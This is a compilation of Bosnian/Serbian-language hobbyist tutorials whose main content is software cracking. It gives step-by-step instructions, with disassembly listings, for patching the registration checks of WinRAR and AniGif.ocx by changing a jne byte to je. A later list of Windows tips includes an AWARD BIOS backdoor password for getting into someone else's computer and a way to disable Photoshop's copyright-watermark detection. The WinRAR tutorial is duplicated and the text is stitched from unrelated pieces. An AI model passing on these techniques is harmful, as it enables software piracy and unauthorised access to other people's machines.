je (jump if equal) skace na neku od operacija ako nadje sta trazi.Primjer:

Igra treba cd da bi se pokrenula. je "jump if equal" je komanda koja

provjerava ima li cd-a u drive-u.cd je nadjen (equal) i nastavlja se dalje u asm-codu (jump if equal).

jne (jump if not equal)Primjer:

Igra treba cd da startuje. jne "jump if not equal" komanda provjerava da li je cd u drive-u.Ukoliko cd nije u drive-u dobijate poruku koja vas obavjestava da cd nije u cd drive-u. To je "jump if not equal" ili jne

komanda.

Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer provjeravanje jel password validan.

Call (call a operation) ova komanda poziva operaciju neku.

jmp (jump to a string/operation) jmp komanda nepoziva komande nego skace na njih.

Nesto o Zastitnim semama:Ima puno zastitnih stilova koje ces morati nauciti i nauciti kako ih

provaliti.Imamo "normalne" cd zastite to jeste passwordom zasticene

programe,igre ivremenski ogranicene programe.

Najlakse zastitne seme za nas su windows error poruke.U ovome textu cu pokazati kako da razbijemo windows message boxove

i da crackujemo WinRar saW32Dasm verzija 8.9 i sa HIEW-om.

Pocinjemo sa Crackingom:Kao prvo pocecemo sa WinRAR-om. Otvorite program.

Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred version)"

Sad cemo kliknuti na "Options"i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi

prozorcic koji ce vam reci da je registracija propala.To je sve sto moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton

Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32 (za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako

promijenis pogresne bajtove)Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce

prozor i moci ces izabrati fajl koji hoces da disassembliras.Izabracemo WinRar95.w32.

Sad W32Dasm pocinje disassembling proces.Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive

znakove nego WINDINGS pisane linije.Ako se ovo desi idite na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je

Arial.Sad cete vidjeti asm-code.Nece vam reci puno jer predpostavljam da neznate sta te sve komande

znace.

Sad pritisnite dugme blizu "print" pod nazivom "strn ref"Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu

pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste ukucali pogresan registracijski cod?Rekao je "registration failed"

(REGISTRACIJA PROPALA)Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na

nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali pogresan registracijski cod.

Ako ste sve ispravno uradili dobicete na ekranu ovo::00413A8F 6A6A push 0000006A

:00413A91 E863640000 call 00419EF9:00413A96 59 pop ecx

:00413A97 50 push eax:00413A98 FF7508 push [ebp+08]

* R e f e r e n c e T o : U S E R 3 2 . M e s s a g e B o x A , O r d : 0 0 0 0 h|

:00413A9B E8120B0100 Call 004245B2:00413AA0 33C0 xor eax, eax

:00413AA2 A358674200 mov dword ptr [00425758], eax:00413AA7 A338564200 mov dword ptr [00425638], eax:00413AAC A34C564200 mov dword ptr [0042564C], eax

:00413AB1 EB56 jmp 00413B09

* Referenced by a (U)nconditional or (C)onditional Jump at Adress: <---------Ovaj je nas

|:00413A82(C)|

* P o s s i b l e S t r i n g D a t a R e f f r o m D a t a O b j - > " Wi n R A R "

:00413AB3 68D86A4200 push 00426AD8:00413AB8 FF359C644200 push dword ptr [0042649C]

* R e f e r e n c e T o : U S E R 3 2 . S e t Wi n d o wT e x t A , O r d : 0 0 0 0 h

:00413ABE E86B0A0100 Call 0042452E

* P o s s i b l e R e f e r e n c e t o S t r i n g R e s o u r c e I D = 0 0 0 4 8 : " n o r m a l "

:00413AC3 6A30 push 00000030

* P o s s i b l e R e f e r e n c e t o D i a l o g : A R C I N F O D L G , C O N T R O L _ I D : 0 0 6 C , " "

Asm code ide od vrha na prema dole sve dok ne naidje na kraj coda ili gresku u codu.To znaci da jne/je komandu moramo promijeniti koja je

negdje gore.Ali kako cemo znati koja je? Sad mozemo pokusati promijeniti svaku i

vidjeti ili mozemo upotrijebiti "Goto Cd loc" dugme koje se nalazi na vrhu.Kada kliknemo na njega mali prozor ce se pojaviti.Na desnoj strani prozora ce se pojaviti text box "Code offset (HEX)" Sada bacimo pogled

na asm-code.Vidjecemo liniju "* Referenced by a (U)nconditional ili(C)onditional Jump At Adress:" linija pored,na njoj se nalazi adresa koju

moramo znati "|:00413A82 (C)" To je broj koji moramo staviti u cod lokacijski prozor 00413A82.Na ovoj adresi cemo pronaci "jump" skok

koji ce slati svaki put error poruki kada ukucamo pogresan cod.Kliknite na Ok u cod lokacijskom prozoru.

Sad smo opet negdje u asm-codu.Bar je na liniji koja nam dopusta da skacemo na poruke.To je jne (jump if not equal).Bar ce promijeniti svoju boju u zeleno.Sada pogledaj na kraj ekrana.Tu je linija koja izgleda kao:

34985 Pg 467 of 998 Code Data @:00413A82@Offset00013082h u Fajlu:Winrar95.w32

Jedna stvar koju moramo zapamtiti je broj poslje @offset.To je 00013082.

Sada idi na HIEW (netrebas zatvarati W32Dasm89) pod HIEW-om otvoriWinRAR95.exe.Klikni na F4 i poslje toga izaberi "decode".Sada mozemo

vidjeti sve te jne/je/eax .. komande i klikni F5.Na vrhi lijevom cosku mozes staviti @offset broj.

Sad klikni F3.Sad smo u mogucnosti da promijenimo vrijednosti. Promijeni od 75(jne) na 74 (je) i klikni na F9.Onda klikni F10.Promijenili smo vrijednosti jne. Sada mozemo isprobati da li

radi.Pokrenucemo program otici do registration ukucati bilo kakav cod ili ime i sta ce biti?

Pojavice se prozor koji ce vam reci da je registracija uspjesna.Zapamtite ako zelimo manipulisati exe fajlovima ka Winrar moramo ga zatvoriti na Windows desktopu ili cemo dobiti poruku "error only read

mode"

Zpamtite osnove.Ako hocemo da cracknemo igru ili aplikaciju pocnite i uvijek gledajte koje vrste error poruke dobijate.Ako je Windows

messege box mocete je cracknuti sa W32Dasm.Ako je neka druga vrsta error poruke bolje je da crackirate sa soft-ice debugger-om.

text by CraX0rUvod u Svijet Cracking-a

by CraX0rBIHNET SECURITY

mad_chroniceia@yahoo.comUvod:

Sta je Cracking?Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti

da nije lakorazumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje

crackinga.Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete

razumijeti nacin na koji cu neke tacke objasniti.

Korak 1:Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili

neznaju nistao ASM-Codu ili o internalnoj funkciji aplikacije.

Potrebni Software:Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows

disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je najbolji za pocetak).To je sve za pocetak.

Sad malo znanja:Kao sto mozda znate nije lako rukovati sa svim tim asm-codovima i

mislim da mnogi neznaju puno o njima,tako da cu obajsniti najpotrebnije komande.

Moramo znati da svaka dva broja u asm-codu predstavljaju jedan bajt (byte).

Broj 73536357 =4 bajta (bytes).75 je jedan bajt (byte) 43 je jedan bajt i 45 je jedan bajt.Sad imamo 4bajta.Ako zelimo da ih promjenimo kasnije

znamo da trebamo promijeniti uvijek dva brooja sa dva druga broja.Sad par stvari o brojevima koje ces vidjeti kada disassemble exe. fajl.

je (hexadecimala je 74) = jump if equal (skoci ako je jednak)jne (hexadecimala je 75) = jump if not equal (skoci ako nije jednak)

nop (hexadecimala je 90) =no operation (nema operacija)call (nema hexadecimale) = call a operation (poziva operaciju)

jmp (nema hexadecimale) = jump to string/operation (skok na operciju)

Ovih pet stvari ce nam trebati za pocetak.Ok sad cemo pogledati sta oni zapravo rade u asm-codu.

je (jump if equal) skace na neku od operacija ako nadje sta trazi.Primjer:

Igra treba cd da bi se pokrenula. je "jump if equal" je komanda koja provjerava ima li cd-a u drive-u.cd je nadjen (equal) i nastavlja se dalje

u asm-codu (jump if equal).

jne (jump if not equal)Primjer:

Igra treba cd da startuje. jne "jump if not equal" komanda provjerava da li je cd u drive-u.Ukoliko cd nije u drive-u dobijate poruku koja vas obavjestava da cd nije u cd drive-u. To je "jump if not equal" ili jne

komanda.

Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer provjeravanje jel password validan.

Call (call a operation) ova komanda poziva operaciju neku.

jmp (jump to a string/operation) jmp komanda nepoziva komande nego skace na njih.

Nesto o Zastitnim semama:Ima puno zastitnih stilova koje ces morati nauciti i nauciti kako ih

provaliti.Imamo "normalne" cd zastite to jeste passwordom zasticene

programe,igre ivremenski ogranicene programe.

Najlakse zastitne seme za nas su windows error poruke.U ovome textu cu pokazati kako da razbijemo windows message boxove

i da crackujemo WinRar saW32Dasm verzija 8.9 i sa HIEW-om.

Pocinjemo sa Crackingom:Kao prvo pocecemo sa WinRAR-om. Otvorite program.

Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred version)"

Sad cemo kliknuti na "Options"i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi

prozorcic koji ce vam reci da je registracija propala.To je sve sto moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton

Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32 (za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako

promijenis pogresne bajtove)Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce

prozor i moci ces izabrati fajl koji hoces da disassembliras.Izabracemo WinRar95.w32.

Sad W32Dasm pocinje disassembling proces.Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive

znakove nego WINDINGS pisane linije.Ako se ovo desi idite na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je

Arial.Sad cete vidjeti asm-code.Nece vam reci puno jer predpostavljam da neznate sta te sve komande

znace.Sad pritisnite dugme blizu "print" pod nazivom "strn ref"

Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste ukucali pogresan registracijski cod?Rekao je "registration failed"

(REGISTRACIJA PROPALA)Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na

nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali pogresan registracijski cod.

Ako ste sve ispravno uradili dobicete na ekranu ovo::00413A8F 6A6A push 0000006A

:00413A91 E863640000 call 00419EF9:00413A96 59 pop ecx

:00413A97 50 push eax:00413A98 FF7508 push [ebp+08]

* R e f e r e n c e T o : U S E R 3 2 . M e s s a g e B o x A , O r d : 0 0 0 0 h|

:00413A9B E8120B0100 Call 004245B2:00413AA0 33C0 xor eax, eax

:00413AA2 A358674200 mov dword ptr [00425758], eax:00413AA7 A338564200 mov dword ptr [00425638], eax:00413AAC A34C564200 mov dword ptr [0042564C], eax

:00413AB1 EB56 jmp 00413B09

* Referenced by a (U)nconditional or (C)onditional Jump at Adress: <---------Ovaj je nas

|:00413A82(C)|

* P o s s i b l e S t r i n g D a t a R e f f r o m D a t a O b j - > " Wi n R A R "

:00413AB3 68D86A4200 push 00426AD8:00413AB8 FF359C644200 push dword ptr [0042649C]

* R e f e r e n c e T o : U S E R 3 2 . S e t Wi n d o wT e x t A , O r d : 0 0 0 0 h

:00413ABE E86B0A0100 Call 0042452E

* P o s s i b l e R e f e r e n c e t o S t r i n g R e s o u r c e I D = 0 0 0 4 8 : " n o r m a l "

:00413AC3 6A30 push 00000030

* P o s s i b l e R e f e r e n c e t o D i a l o g : A R C I N F O D L G , C O N T R O L _ I D : 0 0 6 C , " "

Asm code ide od vrha na prema dole sve dok ne naidje na kraj coda ili gresku u codu.To znaci da jne/je komandu moramo promijeniti koja je

negdje gore.Ali kako cemo znati koja je? Sad mozemo pokusati promijeniti svaku i vidjeti ili mozemo upotrijebiti "Goto Cd loc" dugme koje se nalazi na

vrhu.Kada kliknemo na njega mali prozor ce se pojaviti.Na desnoj strani prozora ce se pojaviti text box "Code offset (HEX)" Sada bacimo pogled

na asm-code.Vidjecemo liniju "* Referenced by a (U)nconditional ili(C)onditional Jump At Adress:" linija pored,na njoj se nalazi adresa koju

moramo znati "|:00413A82 (C)" To je broj koji moramo staviti u cod lokacijski prozor 00413A82.Na ovoj adresi cemo pronaci "jump" skok

koji ce slati svaki put error poruki kada ukucamo pogresan cod.Kliknite na Ok u cod lokacijskom prozoru.

Sad smo opet negdje u asm-codu.Bar je na liniji koja nam dopusta da skacemo na poruke.To je jne (jump if not equal).Bar ce promijeniti svoju boju u zeleno.Sada pogledaj na kraj ekrana.Tu je linija koja izgleda kao:

34985 Pg 467 of 998 Code Data @:00413A82@Offset00013082h u Fajlu:Winrar95.w32

Jedna stvar koju moramo zapamtiti je broj poslje @offset.To je 00013082.

Sada idi na HIEW (netrebas zatvarati W32Dasm89) pod HIEW-om otvoriWinRAR95.exe.Klikni na F4 i poslje toga izaberi "decode".Sada mozemo

vidjeti sve te jne/je/eax .. komande i klikni F5.Na vrhi lijevom cosku mozes staviti @offset broj.

Sad klikni F3.Sad smo u mogucnosti da promijenimo vrijednosti. Promijeni od 75(jne) na 74 (je) i klikni na F9.Onda klikni F10.

Promijenili smo vrijednosti jne. Sada mozemo isprobati da li radi.Pokrenucemo program otici do registration ukucati bilo kakav cod ili

ime i sta ce biti?Pojavice se prozor koji ce vam reci da je registracija uspjesna.

Zapamtite ako zelimo manipulisati exe fajlovima ka Winrar moramo ga zatvoriti na Windows desktopu ili cemo dobiti poruku "error only read

mode"

*-*-*-*-*-*-*-*-*-*-*--- Cracking I dio --*-*-*-*-*-*-*-*-*-*-*

* Prije nego sto pocnete citati ovaj text, trebateskinuti 2 programa sa nhs-ac sajta /Cracking/ i to

W32 Dasm i Hex Editor. E takodjer bi trebali daznate neke osnovne komande i zasta ti programi sluze.

Zato lijepo fino skoknite do NHS-AC sajta i procitajte o tome.E ako ste sve procitali i shvatili sta uopce zelite, mozemo

poceti.

* AniGif.ocx

Naime, u ovom tutoru cemo cracknuti jedanfajl koji se nalazi u Visual Basic-u 6. (Samo da znate da sam

sve testirao i da sam ja cracknuo, zatoslobodno mozete nesto pitat ako vam nije jasno).

Fajl se zove AniGif.ocx i nalazi se u Windows\Systemdirektoriju. Taj fajl sluzi za ubacivanje

GIF animacija u VB6. Medjutim, da bi to mogli moratese registrovat. Ali mi zelimo to cracknut.

Nije problem, naucit cete :))Znaci, moramo nekako "ukinut" registraciju.Ako ste pripremili W32 Dasm, pokrenite ga i

ucitajte fajl AniGif.ocx. Vec sam rekao gdje se nalazii za svaki slucaj napravite kopiju tog fajla.

Sada idemo na crack!

* Cracking

Kada ste ucitali fajl u W32 Dasm, trebate uraditi sljedece.E ako u VB6 pokusamo ubaciti GIF animaciju, prvo se moramo

registrovat kao sto sam rekao. Medjutim ako upisemopogresan serijski broj, pokazat ce se poruka:

"The registration info is incorrect."E sada tu poruku moramo naci u W32 Dasm-u.

Idite na opciju "Stn REF" pogledajte ove male iconegore na vrhu. E to je druga icona sa desne strane.Kliknite na nju. Zatim nadjite onu poruku koju smomalo prije vidjeli. E kada ste je nasli kliknite na nju.

Zatim cemo doci do tog dijela coda. Mi cemo biti na liniji::10017320 68BC0A0210 push 1002ABC.

E sada pritisnite tipku PageUp 6 puta!Onda pogledajte 2 reda iznad i vidjece te ovaj code:

*Referenced by a (U)nconditional or (C)onditional Jump at Address::1001715C(C)

Sada moramo otici do jedne lokacije.Ako ste procitali Cracking na nhs-ac sajtu onda znate sta treba.

Ali ja cu opet pojasnit.Trebate otici do ove adrese: 1001715C

Pritisnite tipku Shift-12 i upisite: 1001715CZatim cete biti prebaceni na ovoj liniji:

:1001715C 7568 jne 100172C6

*-*-*-*-*-*-*--- Cracking II dio --*-*-*-*-*-*-*-

* Ovo je nastavak od I dijela.Znaci, mi smo nasli adresu koju moramo promijenit.

To je ona adresa koju ste zapisali.:1001715C 7568 jne 100172C6

Sada (prvo izadjite iz W32 Dasm) i pokreniteHex Editor. Ucitajte onaj isti fajl.

Zatim pritisnite tipku F4 i idite na "Decode".Sada trebate ici na lokaciju :1001715C

Pritisnite F5 i prvo unesite . pa ovaj broj.To bi izgledalo ovako: .1001715C

E kada ste dosli na tu lokaciju, trebate onoJNE promijeniti u JE.

Pritisnite F3 i broj 75 promijenite u 74.Znaci ako ste to uradili, ovako bi trebalo da izgleda:

:1001715C 7468 je 100172C6

Pritisnite tipku F9 i izadjite iz programa (ESC ili F10).

Brraaavvvvooooooo! Upravo ste cracknuli svoj prviprogram. Cestitam. Sada pokrenite VB6, uzmite komponentu"GIF animation" i naravno, sada ce biti: Unregister :)))))))))

Sada mozete ubacivati svoje GIF animacije :))

------------------------------------------------------------------

*-*-*-*-*--- Windows trikovi ---*-*-*-*-*-*-*-*-*-*-*

Sada pocnimo sa windows trikovima...jos jedan odlican tutor koji sam pokusao da odjednom u cugu napisem ali mi se nije dalo...pa sam ga pisao 2 dana tako sto sam ga sacuvaoSave As My documents Windows trikovi...Stvarno ima puno windows trikova i vjerujem da ce mi za vrijeme pisanja ovog doca stalno govoriti nema enough memory traj lejter itd. itd.(Nadam se da ste primjetili kako mi je dobar engleski).

U nastavku slijedi jos Windows trikova iako ovaj gore nije licio windowstriku, al et...sta je tu je...

Da li ste znali da mozete da stavljate pozadinu kada udjete u svoj omiljenidirektorij?Pa mozete, idite na View &gt; Customize this Folder... i tamo koristite minznanje engleskog...

ovaj trik je lakse radjenje Refresha web stranice, tj. pritiskanje F5 da bisteRefresh web stranicu.

Huh...trebao sam staviti naziv Kompjuterski trikovi...

Da li ste znali?Da mozete da ukucate rijec u Adres baru i pritiskajuci CTRL+ENTER kompjuterautomatski dodaje http://www.com na tu Vasu rijec.

Da otprintate trenutnu stranicu pritisnite CTRL+P

Da trazite nesto putem adres bara ukucajte go, find ili ? i onda rijeckoju zelite naci...

Ako zelite da izvucete maksimum iz svog racunara, a vi to neizmerno zelite, cak sta vise treptite za tim trenutkom, pokusajte provesti u delo sledecih par saveta:a) Desni klik na prazan prostor na desktopu i odaberete Properties. Kliknite na Effects i iskljucite sve opcije koje se nalaze pod Visual effects. Ovim postupkom ubrzali ste otvaranje menija, pomeranje prozora, i jos neke druge stvari.b) Redovno koristite alat za defragmentaciju diska. Nalazi se u Start-&gt;Programs-&gt;Accessories-&gt;System Tolls-&gt;Disk defragmenter. Redovnim odrzavanjem diska mozete povecati performanse kompjutera do 10%.

Kako pristupiti CD-ROM-u u Safe modu? Pre nego sto PC pocne da bootujeWindows drzite CTRL ili F8 da bi ste pristupili Start meniju. Izaberite Command Prompt Only i otkucajte'win/d:m' (bez apostrofa), potvrdite sve sa ENTER.

Jedna od stvari koja moze uzrokovati probleme, narocito na racunarima sa slabijim grafickim karticama je i kolicina boja sa kojima se vrsi prikaz slike na monitoru. Preporuka je da ne povecavate kolicinu boja iznad 16 bitne jer ionako necete primetiti razliku (osim ako se ne bavite grafickim dizajnom) izmedju 16 bitne i 32 bitne kolicine boja, a vasa graficka kartica bice vam zahvalna i radice sa puno manje napora.

Pojavio vam se virus. Jedna od najlaksih promena sistema na viruse trojance je da u DOS Prompt-u otkucate netstat-a. Ako u momentu izvrsenja ove naredbe racunar nije povezan na Internet dobicete prikaz svih otvorenih port-ova i informaciju da li postoji neki otvoreni port koji ima status Listening. Ako je broj port-a ispod 1024, velika je verovatnoca da se radi o nekom sistemskom servisu. Medjutim, ako je broj port-a koji se prisluskuje iznad 1024 proverite sistem sa nekim anti-virusnim programom.

Mislim da svako zna za igricu FreeCell koja dolazi uz Windows. Koliko puta vam se desilo da poludite i vise nego ista pozelite da pobedite pa makar i na prevaru. Ako pritisnete kombinaciju tastera CTRL+SHIFT+F10 tokom igre, dobicete meni gde ce vas racunar upitati da li zelite da pobedite, izgubite ili nastavite da igrate.

Ako ste zaboravili BIOS sifru ili treba da radite sa prijateljevim racunarom i iz visih i neobjasnjivih razloga morate da cacnete nesto po njegovoj masini, a on vam (zloca jedna) nije rekao sifru ucinite sledece. Restartujte racunar sa ukljucenim CAPS LOCK-om. Drzeci Shift taster otkucajte AWARD-SWOvo bi trebalo da vam obezbedi ulaz na sve racunare koji koriste AWARD BIOS.

Koji je dobar nacin da se zastitite od virusa kada vec nemate neki anti-virus program? Idite na Start/Find i nadjite sve fajlove sa ekstenzijom EXE i DLL. Selektujte ih, kliknite desnim dugmetom na njih i izaberite Properties. Pod Attributes selektujte Read-only i onda na OK. Od sada se fajlovi sa ekstenzijom EXE i DLL, koji su inace meta virusa, ne mogu menjati posto se oni, od sada, samo mogu citati ( Read-only). Ovakva vrsta zastite predstavlja problem za update programe tako da pre nego sto update-ujete morate iskljuciti Read-only.

Svi znamo da CTRL+A selektuje ceo tekst. Znate li da mozete u MS Wordu da selektujete sa F8? Pritisnite F8 jedanput da bi ukljucili ovu mogucnost. Stavite kursor negde na tekst. Pritinsite ponovo F8 i selektovace se cela rec. Treci put selektovace se cela recenica, cetvrti put paragraf a peti put ceo dokument. Obrnuti proces sa SHIFT.

Kada zatvorite neku aplikaciju neke biblioteke(DLL) i dalje ostaju ucitane u memoriji iako ne sluze nicemu. Da bi ste ustedeli memoriju uradite sledece. Startujte Regedit pa idite do HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer i napravite novi String Value sa imenom AlwaysUnloadDll i dodelite mu vrednost 1.Restartujte Windows i uzivajte u cistoj memoriji.Napomena: ovaj trik bi trebalo da koriste samo oni ljudi koji koriste obilje razlicitih programa svakodnevno. Onim ostalim ne bih preporucio ovaj trik jer ce usporiti ucitavanje programa jer ce se biblioteke svaki put ponovo ucitavati.

Da li vam se desava da ScanDisk posle desetak sekundi pocne ponovo sve ispocetka da radi? Najbolje resenje je da startujete ScanDisk sa Windows 98 boot diskete jer tada nema ovakvih simptoma. Takodje, treba da proverite scandisk.ini koji se nalazi u Windows \ Command folderu. Namestite NumPasses vrednost na 5 a ScanTimeOut treba da bude na ON.

Ukoliko zelite da u MS Wordu selektujete samo onaj tekst koji se nalazi u zamisljenom pravougaoniku kojeg vi definisete, pritisnite zajedno CTRL+ALT+SHIFT i drzeci levi taster misa opisite granice pravougaonika. Ovo vam daje mogucnost selektovanja kao u npr. Photoshopu.

Kako preimenovati ikonu Recycle Bin? Startujte Regedit i idite do HKEY_LOCAL_MACHINE \ Software \ Classes \ CLSID\{645FF040-5081-101B-9F08 -00AA002F954E} \ ShellFolder. Kliknite dvaaput na 'Attributes' i promenite broj u 50010020. Nakon ovoga dobicete u meniju komandu Rename

Neki DOS programi kada se startuju iz Explorera samo otvore prozor DOS prompta i u nedostatku parametra odmah zatvore prozor tako da vi ne znate sta je pisalo. Jedini lek je da sami odete u DOS prompt i da otkucate putanju do fajla i onda da ga direktno startujete. Medjutim, taj odlazak u spomenuti direktorijum moze biti prilicno zamoran jer DOS skracuje imena direktorijuma i fajlova npr. na C:\PROGRA~1\SISOFT~1\SPEEDI~1.EXE. Zbog toga je mnogo lakse da principom Drag&amp;Drop prevucete fajl iz Explorera u DOS prompt i odmah dobijete kompletnu putanju do fajla i sve sto vam ostaje je da pritisnete ENTER.

Windows povremeno javlja keyboard overflow problem u keyboard baferu ili jednostavno cujete pistanje na dodir tastature. Povecajte buffer tako sto cete otici do HKEY_ LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ Kbdclass\Parameters i napravite DWORD value sa imenom KeyboardDataQueueSize. Vrednost povecajte npr. na 64 hex

Neko vam stalno menja pozadinu Windowsa i to vas nervira? Resenje je da startujete Regedit i odete do HKEY_ CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System. Napravite

DWORDvalue: "NoDispBackgroundPage" (bez navodnika) i dodelite mu vrednost 1. Od sada Background opcija u Display Propertiesu nece biti dostupna.

Kako na najlaksi nacin napraviti svoj Screen Saver? Desno dugme na Desktop pa Properties i onda na Screen Saver. Izaberite '3D Flying Objects'. Kliknite na Settings pa pod Style odaberite 'Textured Flag'. Kliknite na 'Texture' i locirajte bilo koju BMP sliku (koja moze biti i npr. logo vase firme). Otkacite 'Smooth shading' stavite 'Resolution' i 'Size' na MAX. Kliknite na OK pa na Preview da vidite sta ste uradili

Znate li za opciju Combine and Decode u Outlook Expressu?Selektujte vise poruka drzeci CRTL ili SHIFT i idite do Message menija i stavke 'Combine and Decode...'. Dobicte od svih selektovanih poruka jednu veliku poruku koju npr. mozete da stampate ili nesto slicno.

Ukoliko zelite da startujete starije programe koji nisu pisani za Windows 2000 pogledajte 'Application Compatibility tool' kojeg mozete pronaci na instalacionom CDu Windowsa 2000 u folderu Support pod nazivom APCOMPAT.EXE. Ovo vam dodje kao neki emulator Windowsa 95/98 pod 2K

U Windowsu 2000 Profesional Add/Remove stavka vise na sadrzi onoliko Windows komponeneti, kao pre, koje se mogu deinstalirati. Ima i zato leka! Skoknite do INF foldera i otvorite SYSOC.INF fajl u Notepadu. Izbrisete rec HIDE ispred svake stavke i snimite. Od sada Windows "igra otvorenih karata".

Ukoliko zelite da na najlaksi nacin, bez upotrebe raznih shareware-ova, prevedete IP broj (npr. 245.84.120.19) u nesto razumljivo i pamtljivo, idite u DOS i otkucajte NSLOOKUP [IP]

ActiveX plug-inovi mogu biti korisni ali mogu i da zasmetaju. Problem kod njih je da se ne mogu jednostavno deinstalirati iz Add/Remove apleta nego jedino rucno. Idite do Windows/ Downloaded Program Files foldera gde cete naci sve ActiveX plug-inove koje imate instalirane. Ukoliko neki ne zelite vise na vasem sistemu, kliknite desnim dugmetom na njega i izaberite Remove. ALI, budite jako pazljivi i radite ovo samo ako 100% znate sta uklanjate i zasto.

Korisnici Photoshopa od verzije 5 su primetili da prilikom otvaranja svakog fajla Photoshop odradi 'Detect watermark' koji sluzi nekoj vrsti zastiti copyrighta. Ukoliko vas nije briga za copyright neke slike ili samo zelite da ubrzate ucitavanje slike za par sekundi, skoknite do foldera gde je instaliran Photoshop pa onda udjite u Plugin folder. Sve sto treba da uradite je da obrisete folder Digimarc ili jos bolje da ga prebacite u neki drugi folder ukoliko vam kasnije zatreba.

Kako ubrzati startovanje programa? Startujte ga kao 'Minimized'. Windows nece morati da renderuje prozor i njegov sadrzaj pa ce program biti brze u statusu 'ready to use'. Medjutim, nemojte ocekivati da ovom metodom sacuvate memorijske resurse - samo skracujete

brzinu ucitavanja. Ovo je veoma zgodno za programe koji se startuju sa Windowsom.

Budite obazrivi da kada saljete e-mail, fajl koji ste prikacili (attachment) povecava se za oko 30% a to nije malo. Treba voditi racuna da kada narucujete fajlove na email, preko npr. emailfile.com, treba da dodate ovih 30% na originalnu velicinu fajla. Personal Mailbox na EUnetu je 4MB sto ce reci da max velicina fajla koji moze da vam stigne je oko 3000KB.

Kada sistem pocne sporo da reaguje i sve vam se cini da ce uskoro da padne, a sebi ne mozete da dozvolite da restartujete sistem uradite sledece. Pritisnite CTRL+ALT+DEL, oznacite Explorer i kliknite END TASK dugme. Dobicete poruku "Are you sure you want to exit windows?" a vi pritisnete ESC i sacekajte par sekundi do sledece poruke "Explorer is not responding". Kliknite na END TASK i Desktop ce se osveziti. Windows bi trebao da reaguje bolje jer je ovo neka vrsta pseudo reboota.

Kako pronaci uzrok pada odredjenog programa. Resenje se moze potraziti sa Dr.Watsonom kojeg dobijate sa Windowsom. Procedura je u tome da startujete Dr.Watsona i dovedete problematicni program u stanje pada. Dr.Watson ce to uredno registrovati i snimiti stanje celokupnog stanja hardvera, softvera, drajvera i operativnog sistema a na vama je da na osnovu vaseg znanja tumacite log file i zakljucite sta se desilo.

Kako u Microsoft Wordu napraviti tabelu bez upotrebe misa na najlasi nacin? Otkucajte samo '+-+' (bez navodnika) i pritisnite ENTER. Eto tabele! Ukoliko zelite tabelu sa npr. cetiri celije otkucajte '+-++++' (bez navodnika).

Ukoliko zelite da na najbrzi nacin dodate razmak u meniju Outlook Expressa 5, dovoljno je samo da drzite SHIFT i da kliknete levim dugmetom misa na ikonu izpred koje zelite razmak.

Koliko ste puta u browseru videli gresku 404-File not found? Ukoliko vam je zaista stalo da vidite tu stranicu, stavite URL u clipboard i idite na sajt http://www.google.com/ i pod pretragom Pastujte problematicni URL. Google ce pronaci sajt a na vama je da kliknete na Cached link gde cete videti taj URL iz Googleovog kesa.

Recimo da je vam je folder My Documents najposeceniji folder na hard disku i recimo da cesto koristite Wordpad. Kliknte desnim dugmetom na ikonu Worpada i pod Start In otkucajte C:\My Documents. Od sada svaki put kada otvarate neki fajl u Wordpadu Dialog box ce vas odvesti direktno u My Documents folder.

Sa Windowsom 98 SE dolazi mali utility sa kojim mozete da editujete i menjate vremenske zone. Mozete ga naci na instalacionom CDu u folderu Tools\Reskit\Config\tzedit.exe

Zelite li browser bez ivica? Otkucajte pod RUN "iexplore -k

javascript: moveTo(100,100); resizeTo(500,400)" i dobicete Internet Explorer koji nema ni jednu ivicu...Ivicu?

U triku 240 je spominjana komanda FC koja uporredjuje dva fajla i izbacuje rezultat u okviru teksta sa promenama. Korisnici Windowsa 98/2000 slican program, ali sada u Windows verziji, mogu naci na instalacionom CDu za ovaj operativni sistem. Lokacija za W98 je Tools \ Reskit \ Files a za W2000 Support \ Tools folder\SUPPORT.CAB. Startujte fajl WINDIFF.EXE

Kako pronaci sliku na internetu koja se zove npr. FOTKA? Uz Alta Vistu sve je moguce. Dovoljno je da u search fieldu otkucate 'image:fotka'

